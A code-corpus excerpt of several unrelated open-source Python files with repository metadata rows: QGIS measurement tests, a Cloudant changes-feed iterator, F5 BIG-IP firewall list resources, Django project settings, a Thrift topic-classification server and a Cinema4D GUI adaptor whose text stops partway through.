self.assertFalse(da.willUseEllipsoid())
def testLengthMeasureAndUnits(self):
"""Test a variety of length measurements in different CRS and ellipsoid modes, to check that the
calculated lengths and units are always consistent
"""
da = QgsDistanceArea()
da.setSourceCrs(3452)
da.setEllipsoidalMode(False)
da.setEllipsoid("NONE")
daCRS = QgsCoordinateReferenceSystem()
daCRS.createFromSrsId(da.sourceCrs())
# We check both the measured length AND the units, in case the logic regarding
# ellipsoids and units changes in future
distance = da.measureLine(QgsPoint(1, 1), QgsPoint(2, 3))
units = da.lengthUnits()
print "measured {} in {}".format(distance, QgsUnitTypes.toString(units))
assert ((abs(distance - 2.23606797) < 0.00000001 and units == QGis.Degrees) or
(abs(distance - 248.52) < 0.01 and units == QGis.Meters))
da.setEllipsoid("WGS84")
distance = da.measureLine(QgsPoint(1, 1), QgsPoint(2, 3))
units = da.lengthUnits()
print "measured {} in {}".format(distance, QgsUnitTypes.toString(units))
assert ((abs(distance - 2.23606797) < 0.00000001 and units == QGis.Degrees) or
(abs(distance - 248.52) < 0.01 and units == QGis.Meters))
da.setEllipsoidalMode(True)
distance = da.measureLine(QgsPoint(1, 1), QgsPoint(2, 3))
units = da.lengthUnits()
print "measured {} in {}".format(distance, QgsUnitTypes.toString(units))
# should always be in Meters
self.assertAlmostEqual(distance, 247555.57, delta=0.01)
self.assertEqual(units, QGis.Meters)
# test converting the resultant length
distance = da.convertLengthMeasurement(distance, QGis.NauticalMiles)
self.assertAlmostEqual(distance, 133.669, delta=0.01)
# now try with a source CRS which is in feet
da.setSourceCrs(27469)
da.setEllipsoidalMode(False)
# measurement should be in feet
distance = da.measureLine(QgsPoint(1, 1), QgsPoint(2, 3))
units = da.lengthUnits()
print "measured {} in {}".format(distance, QgsUnitTypes.toString(units))
self.assertAlmostEqual(distance, 2.23606797, delta=0.000001)
self.assertEqual(units, QGis.Feet)
# test converting the resultant length
distance = da.convertLengthMeasurement(distance, QGis.Meters)
self.assertAlmostEqual(distance, 0.6815, delta=0.001)
da.setEllipsoidalMode(True)
# now should be in Meters again
distance = da.measureLine(QgsPoint(1, 1), QgsPoint(2, 3))
units = da.lengthUnits()
print "measured {} in {}".format(distance, QgsUnitTypes.toString(units))
self.assertAlmostEqual(distance, 0.67953772, delta=0.000001)
self.assertEqual(units, QGis.Meters)
# test converting the resultant length
distance = da.convertLengthMeasurement(distance, QGis.Feet)
self.assertAlmostEqual(distance, 2.2294, delta=0.001)
def testAreaMeasureAndUnits(self):
"""Test a variety of area measurements in different CRS and ellipsoid modes, to check that the
calculated areas and units are always consistent
"""
da = QgsDistanceArea()
da.setSourceCrs(3452)
da.setEllipsoidalMode(False)
da.setEllipsoid("NONE")
daCRS = QgsCoordinateReferenceSystem()
daCRS.createFromSrsId(da.sourceCrs())
polygon = QgsGeometry.fromPolygon(
[[
QgsPoint(0, 0), QgsPoint(1, 0), QgsPoint(1, 1), QgsPoint(2, 1), QgsPoint(2, 2), QgsPoint(0, 2), QgsPoint(0, 0),
]]
)
# We check both the measured area AND the units, in case the logic regarding
# ellipsoids and units changes in future
area = da.measureArea(polygon)
units = da.areaUnits()
print "measured {} in {}".format(area, QgsUnitTypes.toString(units))
assert ((abs(area - 3.0) < 0.00000001 and units == QgsUnitTypes.SquareDegrees) or
(abs(area - 37176087091.5) < 0.1 and units == QgsUnitTypes.SquareMeters))
da.setEllipsoid("WGS84")
area = da.measureArea(polygon)
units = da.areaUnits()
print "measured {} in {}".format(area, QgsUnitTypes.toString(units))
assert ((abs(area - 3.0) < 0.00000001 and units == QgsUnitTypes.SquareDegrees) or
(abs(area - 37176087091.5) < 0.1 and units == QgsUnitTypes.SquareMeters))
da.setEllipsoidalMode(True)
area = da.measureArea(polygon)
units = da.areaUnits()
print "measured {} in {}".format(area, QgsUnitTypes.toString(units))
# should always be in Meters Squared
self.assertAlmostEqual(area, 37416879192.9, delta=0.1)
self.assertEqual(units, QgsUnitTypes.SquareMeters)
# test converting the resultant area
area = da.convertAreaMeasurement(area, QgsUnitTypes.SquareMiles)
self.assertAlmostEqual(area, 14446.7378, delta=0.001)
# now try with a source CRS which is in feet
polygon = QgsGeometry.fromPolygon(
[[
QgsPoint(1850000, 4423000), QgsPoint(1851000, 4423000), QgsPoint(1851000, 4424000), QgsPoint(1852000, 4424000), QgsPoint(1852000, 4425000), QgsPoint(1851000, 4425000), QgsPoint(1850000, 4423000)
]]
)
da.setSourceCrs(27469)
da.setEllipsoidalMode(False)
# measurement should be in square feet
area = da.measureArea(polygon)
units = da.areaUnits()
print "measured {} in {}".format(area, QgsUnitTypes.toString(units))
self.assertAlmostEqual(area, 2000000, delta=0.001)
self.assertEqual(units, QgsUnitTypes.SquareFeet)
# test converting the resultant area
area = da.convertAreaMeasurement(area, QgsUnitTypes.SquareYards)
self.assertAlmostEqual(area, 222222.2222, delta=0.001)
da.setEllipsoidalMode(True)
# now should be in Square Meters again
area = da.measureArea(polygon)
units = da.areaUnits()
print "measured {} in {}".format(area, QgsUnitTypes.toString(units))
self.assertAlmostEqual(area, 184149.37, delta=1.0)
self.assertEqual(units, QgsUnitTypes.SquareMeters)
# test converting the resultant area
area = da.convertAreaMeasurement(area, QgsUnitTypes.SquareYards)
self.assertAlmostEqual(area, 220240.8172549, delta=1.0)
def testFormatDistance(self):
"""Test formatting distances"""
QLocale.setDefault(QLocale.c())
self.assertEqual(QgsDistanceArea.formatDistance(45, 3, QGis.Meters), u'45.000 m')
self.assertEqual(QgsDistanceArea.formatDistance(1300, 1, QGis.Meters, False), u'1.3 km')
self.assertEqual(QgsDistanceArea.formatDistance(.005, 1, QGis.Meters, False), u'5.0 mm')
self.assertEqual(QgsDistanceArea.formatDistance(.05, 1, QGis.Meters, False), u'5.0 cm')
self.assertEqual(QgsDistanceArea.formatDistance(1.5, 3, QGis.Kilometers, True), u'1.500 km')
self.assertEqual(QgsDistanceArea.formatDistance(1.5, 3, QGis.Kilometers, False), u'1.500 km')
self.assertEqual(QgsDistanceArea.formatDistance(0.5, 3, QGis.Kilometers, True), u'0.500 km')
self.assertEqual(QgsDistanceArea.formatDistance(0.5, 3, QGis.Kilometers, False), u'500.000 m')
self.assertEqual(QgsDistanceArea.formatDistance(6000, 0, QGis.Feet, True), u'6,000 ft')
self.assertEqual(QgsDistanceArea.formatDistance(6000, 3, QGis.Feet, False), u'1.136 mi')
self.assertEqual(QgsDistanceArea.formatDistance(300, 0, QGis.Feet, True), u'300 ft')
self.assertEqual(QgsDistanceArea.formatDistance(300, 0, QGis.Feet, False), u'300 ft')
self.assertEqual(QgsDistanceArea.formatDistance(3000, 0, QGis.Yards, True), u'3,000 yd')
self.assertEqual(QgsDistanceArea.formatDistance(3000, 3, QGis.Yards, False), u'1.705 mi')
self.assertEqual(QgsDistanceArea.formatDistance(300, 0, QGis.Yards, True), u'300 yd')
self.assertEqual(QgsDistanceArea.formatDistance(300, 0, QGis.Yards, False), u'300 yd')
self.assertEqual(QgsDistanceArea.formatDistance(1.5, 3, QGis.Miles, True), u'1.500 mi')
self.assertEqual(QgsDistanceArea.formatDistance(1.5, 3, QGis.Miles, False), u'1.500 mi')
self.assertEqual(QgsDistanceArea.formatDistance(0.5, 3, QGis.Miles, True), u'0.500 mi')
self.assertEqual(QgsDistanceArea.formatDistance(0.5, 0, QGis.Miles, False), u'2,640 ft')
self.assertEqual(QgsDistanceArea.formatDistance(0.5, 1, QGis.NauticalMiles, True), u'0.5 NM')
self.assertEqual(QgsDistanceArea.formatDistance(0.5, 1, QGis.NauticalMiles, False), u'0.5 NM')
self.assertEqual(QgsDistanceArea.formatDistance(1.5, 1, QGis.NauticalMiles, True), u'1.5 NM')
self.assertEqual(QgsDistanceArea.formatDistance(1.5, 1, QGis.NauticalMiles, False), u'1.5 NM')
self.assertEqual(QgsDistanceArea.formatDistance(1.5, 1, QGis.Degrees, True), u'1.5 degrees')
self.assertEqual(QgsDistanceArea.formatDistance(1.0, 1, QGis.Degrees, False), u'1.0 degree')
self.assertEqual(QgsDistanceArea.formatDistance(1.0, 1, QGis.UnknownUnit, False), u'1.0')
QLocale.setDefault(QLocale.system())
if __name__ == '__main__':
unittest.main()
| gpl-2.0 | -5,419,994,848,910,859,000 | 41.801775 | 210 | 0.617267 | false |
evansde77/metson | src/cloudant/changes.py | 1 | 2389 | #!/usr/bin/env python
"""
_feeds_
Iterator support for consuming changes-like feeds
"""
import json
class Feed(object):
"""
_Feed_
Acts as an infinite iterator for consuming database feeds such as
_changes, suitable for feeding a daemon.
:params:
"""
def __init__(self, session, url, include_docs=False, **kwargs):
self._session = session
self._url = url
self._resp = None
self._line_iter = None
self._last_seq = kwargs.get('since')
self._continuous = kwargs.get('continuous', False)
self._end_of_iteration = False
self._params = {'feed': 'continuous'}
if include_docs:
self._params['include_docs'] = 'true'
def start(self):
"""
_start_
Using the provided session, start streaming
the feed continuously,
if a last seq value is present, pass that along.
"""
params = self._params
if self._last_seq is not None:
params['since'] = self._last_seq
self._resp = self._session.get(self._url, params=params, stream=True)
self._resp.raise_for_status()
self._line_iter = self._resp.iter_lines()
def __iter__(self):
"""
make this object an iterator
"""
return self
def __next__(self):
"""python3 compat"""
return self.next()
def next(self):
"""
_next_
Iterate: pull next line out of the stream,
attempt to convert the response to JSON, handling
case of empty lines.
If end of feed is seen, restart iterator
Returns JSON data representing what was seen in the feed.
"""
if self._end_of_iteration:
raise StopIteration
if not self._resp:
self.start()
line = self._line_iter.next()
if len(line.strip()) == 0:
return {}
try:
data = json.loads(line)
except ValueError:
data = {"error": "Bad JSON line", "line": line}
if data.get('last_seq'):
if self._continuous:
# forever mode => restart
self._last_seq = data['last_seq']
self.start()
return {}
else:
# not forever mode => break
return data
return data
| apache-2.0 | -1,144,968,541,716,865,700 | 24.688172 | 77 | 0.529929 | false |
F5Networks/f5-common-python | f5/bigip/tm/security/shared_objects.py | 1 | 3549 | # coding=utf-8
#
# Copyright 2015-2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""BIG-IP® Advanced Firewall Manager™ (AFM®) module.
REST URI
``http://localhost/mgmt/tm/security/shared-objects``
GUI Path
``Security --> Network Address Translation``
REST Kind
``tm:security:shared-objects:*``
"""
from distutils.version import LooseVersion
from f5.bigip.resource import Collection
from f5.bigip.resource import OrganizingCollection
from f5.bigip.resource import Resource
class Shared_Objects(OrganizingCollection):
"""BIG-IP® AFM® Nat organizing collection."""
def __init__(self, security):
super(Shared_Objects, self).__init__(security)
self._meta_data['minimum_version'] = '14.0.0'
self._meta_data['allowed_lazy_attributes'] = [
Address_Lists,
Port_Lists]
class Address_Lists(Collection):
"""BIG-IP® AFM® Address List collection"""
def __init__(self, shared_objects):
super(Address_Lists, self).__init__(shared_objects)
self._meta_data['allowed_lazy_attributes'] = [Address_List]
self._meta_data['attribute_registry'] = \
{'tm:security:shared-objects:address-list:address-liststate':
Address_List}
class Address_List(Resource):
"""BIG-IP® Address List resource"""
def __init__(self, address_lists):
super(Address_List, self).__init__(address_lists)
self._meta_data['required_json_kind'] = \
'tm:security:shared-objects:address-list:address-liststate'
self._meta_data['required_creation_parameters'].update(('partition',))
self._meta_data['required_load_parameters'].update(('partition',))
self.tmos_ver = self._meta_data['bigip'].tmos_version
if LooseVersion(self.tmos_ver) < LooseVersion('12.0.0'):
self._meta_data['minimum_additional_parameters'] = {
'addressLists', 'addresses', 'geo'}
else:
self._meta_data['minimum_additional_parameters'] = {
'addressLists', 'addresses', 'geo', 'fqdns'}
class Port_Lists(Collection):
"""BIG-IP® AFM® Port List collection"""
def __init__(self, shared_objects):
super(Port_Lists, self).__init__(shared_objects)
self._meta_data['allowed_lazy_attributes'] = [Port_List]
self._meta_data['attribute_registry'] = \
{'tm:security:shared-objects:port-list:port-liststate':
Port_List}
class Port_List(Resource):
"""BIG-IP® Port List resource"""
def __init__(self, port_lists):
super(Port_List, self).__init__(port_lists)
self._meta_data['required_json_kind'] = \
'tm:security:shared-objects:port-list:port-liststate'
self._meta_data['required_creation_parameters'].update(('partition',))
self._meta_data['required_load_parameters'].update(('partition',))
self._meta_data['minimum_additional_parameters'] = {'ports',
'portLists'}
| apache-2.0 | -1,649,058,166,927,586,600 | 37.445652 | 78 | 0.642352 | false |
knightofni/django-template | config/settings/common.py | 1 | 8207 | # -*- coding: utf-8 -*-
"""
Django settings for id_website project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from __future__ import absolute_import, unicode_literals
import environ
ROOT_DIR = environ.Path(__file__) - 3 # (/a/b/myfile.py - 3 = /)
APPS_DIR = ROOT_DIR.path('id_website')
env = environ.Env()
# APP CONFIGURATION
# ------------------------------------------------------------------------------
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
'material',
'material.frontend',
'material.admin',
# Admin
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
'crispy_forms', # Form layouts
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
# Apps specific for this project go here.
LOCAL_APPS = (
'id_website.users', # custom users app
# Your stuff: custom apps go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES = (
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# MIGRATIONS CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
'sites': 'id_website.contrib.sites.migrations'
}
# DEBUG
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool("DJANGO_DEBUG", False)
# FIXTURE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL CONFIGURATION
# ------------------------------------------------------------------------------
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# MANAGER CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
("""Nicolas Paris""", '[email protected]'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
# DATABASES = {
# # Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
# 'default': env.db("DATABASE_URL", default="postgres:///id_website"),
# }
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Asia/Singapore'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
# Your stuff: custom template context processors go here
],
},
},
]
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
str(APPS_DIR.path('static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL Configuration
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# AUTHENTICATION CONFIGURATION
# ------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = 'username'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
# Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = 'users.User'
LOGIN_REDIRECT_URL = 'users:redirect'
LOGIN_URL = 'account_login'
# SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'
# Location of root django.contrib.admin URL, use {% url 'admin:index' %}
ADMIN_URL = r'^admin/'
# Your common stuff: Below this line define 3rd party library settings
| mit | 79,249,630,948,145,120 | 34.682609 | 98 | 0.604971 | false |
serendio-labs-stage/diskoveror-ml-server | TopicThrift/server.py | 1 | 1840 | '''
Copyright 2015 Serendio Inc.
Author - Satish Palaniappan
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
'''
__author__ = "Satish Palaniappan"
### Insert Current Path
import os, sys, inspect
cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
sys.path.append(cmd_folder + '/gen-py')
from categorizer import Categorizer
from categorizer.ttypes import *
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
import socket
sys.path.append(cmd_folder + "/Model/")
import Categorize
class CategorizerHandler:
def __init__(self):
self.log = {}
self.catz = Categorize.Categorize()
def ping(self):
print ("Ping Success !! :)")
return
def getTopic(self, text):
cat = self.catz.getCategory(text)
print ("The Text : " + text + " ||| Topic: " + cat)
return cat
handler = CategorizerHandler()
processor = Categorizer.Processor(handler)
transport = TSocket.TServerSocket(port=8001)
tfactory = TTransport.TBufferedTransportFactory()
pfactory = TBinaryProtocol.TBinaryProtocolFactory()
server = TServer.TSimpleServer(processor, transport, tfactory, pfactory)
print ("Python topics server running...")
server.serve()
| apache-2.0 | -1,131,072,699,975,567,200 | 31.280702 | 168 | 0.755978 | false |
Muterra/py_daemoniker | tests/autotest/_fixtures.py | 1 | 1155 | '''
LICENSING
-------------------------------------------------
daemoniker: Cross-platform daemonization tools.
Copyright (C) 2016 Muterra, Inc.
Contributors
------------
Nick Badger
[email protected] | [email protected] | nickbadger.com
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the
Free Software Foundation, Inc.,
51 Franklin Street,
Fifth Floor,
Boston, MA 02110-1301 USA
------------------------------------------------------
'''
global __SKIP_ALL_REMAINING__
__SKIP_ALL_REMAINING__ = False | unlicense | -1,125,921,936,101,238,800 | 32.028571 | 70 | 0.644156 | false |
corredD/upy | cinema4d/r20/c4dUI.py | 1 | 40522 |
"""
Copyright (C) <2010> Autin L. TSRI
This file git_upy/cinema4d/r14/c4dUI.py is part of upy.
upy is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
upy is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with upy. If not, see <http://www.gnu.org/licenses/gpl-3.0.html>.
"""
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 2 18:17:17 2010
@author: -
"""
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 2 13:45:52 2010
@author: -
"""
import sys,os
import c4d
from c4d import plugins
from c4d import utils
from c4d import bitmaps
from c4d import gui
import random
from upy.uiAdaptor import uiAdaptor
#UI general interface
class c4dUI(gui.GeDialog):
"""
The cinema4d uiAdaptor abstract class
====================================
This Adaptor give access to the basic cinema4d Draw function need for
create and display a gui.
"""
host = "c4d"
scale = 1
maxStrLenght=100
left, top, right, bottom =(25,1,1,1)
oid=1005
bid=1005
id = 1005
plugid = int(random.random()*10000000)
dock = False
w=100
h=100
tab=False
notebook = None
ystep = 0
scrolling = True
def addVariablePropToSc (self, *args):
#ghost function
pass
def CoreMessage(self, id, msg):
""" Hanlde the system event such as key or mouse position """
# print "coremessage"
# print "id",id
# print "msg",msg
return True
#-1008
#20000000073
def _setTitle(self,title):
self.SetTitle(title)
def createMenu(self,menuDic,menuOrder=None):
""" Define and draw the window/widget top file menu
@type menuDic: dictionary
@param menuDic: the menu elements, ie entry, callback and submenu
@type menuOrder: array
@param menuOrder: the menu keys oredered
"""
if menuOrder :
lookat = menuOrder
else :
lookat = menuDic.keys()
self.MenuFlushAll()
for mitem in lookat:
self.MenuSubBegin(mitem)
for elem in menuDic[mitem]:
if elem["sub"] is not None:
self.MenuSubBegin(elem["name"])
for sub in elem['sub']:
self.MenuAddString(elem['sub'][sub]["id"],
elem['sub'][sub]["name"])
self.MenuSubEnd()
else:
self.MenuAddString(elem["id"],elem["name"])
self.MenuSubEnd()
self.MenuFinished()
def handleMenuEvent(self,ev,menu):
""" This function handle the particular menu event, especially for
submenu level action
@type ev: int
@param ev: the current event
@type menu: dictionary
@param menu: the current menu
"""
#verify Enter?
print "menu",ev
if ev == 1056 :
return
for menuId in menu.keys():
for elem in menu[menuId]:
if elem["sub"] is not None:
for sub in elem['sub'].keys():
#print ev,elem['sub'][sub]["id"]
if ev == elem['sub'][sub]["id"] :
#print elem['sub'][sub]
if self._timer :
self.timeFunction(elem['sub'][sub]["action"],ev)
else :
self.callbackaction(elem['sub'][sub],ev)
else :
if ev==elem["id"] :
if self._timer :
self.timeFunction(elem["action"],ev)
else :
self.callbackaction(elem,ev)
def addVariable(self,type,value):
""" Create a container for storing a widget states """
return value
def drawObj(self,elem,x,y,w=None,h=None):
""" Draw an object input where you can drag on object
@type elem: dictionary
@param elem: the button dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
pass
#elem["id"] = gui.LinkBoxGui()
def getFlagAlignement(self,options):
alignement = {"hleft_scale":c4d.BFH_LEFT|c4d.BFH_SCALE| c4d.BFV_MASK,
"hcenter_scale":c4d.BFH_CENTER|c4d.BFH_SCALE| c4d.BFV_MASK,
"hleft":c4d.BFH_LEFT| c4d.BFV_MASK,
"hfit":c4d.BFH_FIT| c4d.BFV_MASK,
"hfit_scale":c4d.BFH_SCALEFIT| c4d.BFV_MASK,
"hcenter":c4d.BFH_CENTER| c4d.BFV_MASK,
}
if type(options) is int :
return options
elif options not in alignement :
print options
return c4d.BFH_SCALEFIT|c4d.BFV_MASK
return alignement[options]
def drawButton(self,elem,x,y,w=None,h=None):
""" Draw a Button
@type elem: dictionary
@param elem: the button dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
name = elem["name"]
if elem["label"] != None:
name = elem["label"]
self.AddButton(id=elem["id"], flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale,
name=name)
def drawCheckBox(self,elem,x,y,w=None,h=None):
""" Draw a checkBox
@type elem: dictionary
@param elem: the button dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
name = elem["name"]
if elem["label"] != None:
name = elem["label"]
self.AddCheckbox(id=elem["id"],flags=elem["alignement"],#BFH_SCALEFIT,
name=name,
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
if elem["value"] is not None :
self.SetBool(elem["id"],elem["value"])
def resetPMenu(self,elem):
""" Add an entry to the given pulldown menu
@type elem: dictionary
@param elem: the pulldown dictionary
"""
elem["value"]=[]
self.FreeChildren(elem["id"])
def addItemToPMenu(self,elem,item):
""" Add an entry to the given pulldown menu
@type elem: dictionary
@param elem: the pulldown dictionary
@type item: string
@param item: the new entry
"""
self.AddChild(elem["id"],len(elem["value"]),item)
elem["value"].append(item)
self.SetLong(elem["id"],len(elem["value"])-1)
def drawPMenu(self,elem,x,y,w=None,h=None):
""" Draw a pulldown menu
@type elem: dictionary
@param elem: the pulldown dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_LEFT|c4d.BFH_SCALEFIT
self.AddComboBox(id=elem["id"],flags=elem["alignement"],
initw=elem["width"]*self.scale)
# inith=elem["height"]*self.scale)
[self.AddChild(elem["id"],x[0],x[1]) for x in enumerate(elem["value"])]
def drawLine(self,elem,x,y,w=None,h=None):
""" Draw a Separative Line
@type elem: dictionary
@param elem: the label dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["value"] == "H":
self.AddSeparatorH(self.w,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK)
elif elem["value"] == "V":
self.AddSeparatorV(self.w,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK)
def drawLabel(self,label,x,y,w=None,h=None):
""" Draw a Label
@type elem: dictionary
@param elem: the label dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if label["alignement"] is None :
label["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddStaticText(label["id"],flags=label["alignement"])#BFH_SCALEFIT)#|c4d.BFV_SCALEFIT)#c4d.BFH_LEFT)c4d.BFH_LEFT|
self.SetString(label["id"],label["label"])
def drawStringArea(self,elem,x,y,w=None,h=None):
""" Draw a String Area input elem, ie multiline
@type elem: dictionary
@param elem: the string area input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddMultiLineEditText(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale,
style=c4d.DR_MULTILINE_SYNTAXCOLOR)
